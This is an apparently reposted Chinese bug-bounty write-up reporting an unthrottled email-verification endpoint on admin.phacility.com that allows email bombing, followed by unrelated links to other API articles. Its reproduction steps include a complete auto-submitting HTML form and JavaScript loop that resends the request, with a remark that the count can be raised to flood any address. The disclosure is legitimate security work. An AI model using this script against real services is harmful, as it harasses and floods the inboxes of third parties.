api漏洞系列-邮箱验证API接口无限制,可作为邮箱炸弹

简介: 漏洞描述https://admin.phacility.com/settings/user/toma/page/email/ 中的API接口是无限的,可以用作邮箱炸弹。



前言


声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。


漏洞描述

https://admin.phacility.com/settings/user/toma/page/email/ 中的API接口是无限的,可以用作邮箱炸弹。


复现步骤


1.注册用户并等待验证电子邮件地址  

17.png

2.使用如下代码:  

<form id="myform" action="https://admin.phacility.com/settings/user/toma/page/email/?verify=14295" method="POST" target="_blank">
  <input type="text" name="__csrf__" value="B@f3wyama2759fcd6f915746da">
  <input type="text" name="__form__" value="1">
  <input type="text" name="__dialog__" value="1">
  <input type="text" name="verify" value="14295">
  <input type="text" name="__submit__" value="true">
  <input type="text" name="__wflow__" value="true">
  <input type="text" name="__ajax__" value="true">
  <input type="text" name="__metablock__" value="3">
</form>
<script>
  function interval(func, wait,  times)
  { 
    var interv = function(w, t){ 
      return function(){
        if(typeof t === "undefined" ||  t-- > 0){ 
          setTimeout(interv, w); 
          try{ 
            func.call(null);
          }  catch(e) {
            t = 0; 
            throw e.toString(); 
          } 
        } 
      }; 
    }(wait, times); 
    setTimeout(interv, wait);
  };//submit every 2000ms,execute 5 times(you can change this number  to execute moretimes)
  interval(
    function(){ document.getElementById("myform").submit(); },
    2000,
    5
  );
</script>

其中__csrf__是你的token,由于这次邮箱没有经过验证,所以我注册的时候可以写任何邮箱,然后就可以轰炸任何人的邮箱.

18.png

目录
相关文章
|
7天前
|
存储 前端开发 安全
Nuxt3 实战 (十):使用 Supabase 实现 RESTful 风格 API 接口
这篇文章介绍了如何使用Supabase实现RESTful风格的API接口,用于网站分类和子站点的增删改查(CURD)功能。文章首先阐述了表设计,包括ds_categorys和ds_websites两张表的列名、类型和用途,并提到了为每张表添加的user_id和email字段以支持用户身份识别。接着,文章描述了接口设计,以ds_websites表为例,说明了如何通过RESTful API实现CURD功能,并给出了使用SupabaseClient实现插入数据的相关代码。文章最后提供了项目效果预览和总结,指出学习了Nuxt3创建接口及调用Supabase数据库操作。
Nuxt3 实战 (十):使用 Supabase 实现 RESTful 风格 API 接口
|
4天前
|
自然语言处理 安全 API
触发邮件接口有哪些?邮件API文档
**触发邮件接口**如AokSend、Mailgun、Amazon SES、Postmark和Sendinblue是自动化企业通信的关键。这些接口在特定事件时自动发送邮件,提高效率和客户体验。例如,AokSend提供详细的API文档,支持事件触发、模板管理和多语言集成;Mailgun以灵活性著称;Amazon SES适合大规模发送;Postmark专注于事务邮件;Sendinblue则提供邮件、短信和营销自动化功能。每种服务都有示例代码展示如何使用API发送邮件。选择合适的接口能提升企业通信效率和客户满意度。
|
6天前
|
XML 安全 API
API攻防-接口安全&SOAP&OpenAPI&RESTful&分类特征导入&项目联动检测
API攻防-接口安全&SOAP&OpenAPI&RESTful&分类特征导入&项目联动检测
|
5天前
|
安全 API 网络安全
API接口安全加固:应对黑客攻击的实战指南
**API安全摘要:** API成为黑客目标,攻击类型包括未授权访问、CSRF、DDoS、数据泄露和注入攻击。防御策略包括使用OAuth 2.0和JWT进行认证授权,防止CSRF攻击,限制请求速率,避免数据泄露,以及实施注入攻击防护。开发者应定期更新安全措施,确保API安全性。示例代码展示了Node.js中JWT认证的实现。
|
5天前
|
Java API
java调用个人微信API接口收发朋友圈,删除评论朋友圈
java调用个人微信API接口收发朋友圈,删除评论朋友圈
|
8天前
|
JSON API 数据格式
网易云音乐随机歌曲调用API接口
网易云音乐随机歌曲调用API接口
12 1
|
2天前
|
安全 API 数据安全/隐私保护
​验证码邮件API有哪些?分析最好的3个接口平台
验证码邮件API如AOKSend、SendGrid和Mailgun是用户身份验证的关键工具。这些API提供高效、可靠的邮件发送服务,确保验证码的安全传输。AOKSend以其快速发送和易用性著称,SendGrid则以全面功能和扩展性见长,而Mailgun则以灵活性和高送达率闻名。开发者可以根据需求选择合适的API,通过示例代码轻松集成到应用中,增强安全性和用户体验。
|
5天前
|
安全 API 开发工具
微信开发:API接口与ipad协议的深度比较及最佳选择
微信开发:API接口与ipad协议的深度比较及最佳选择
|
5天前
|
API
微信API接口、微信二次开发API调用
微信API接口、微信二次开发API调用
|
5天前
|
API Android开发 iOS开发
个人微信开发API协议接口
个人微信开发API协议接口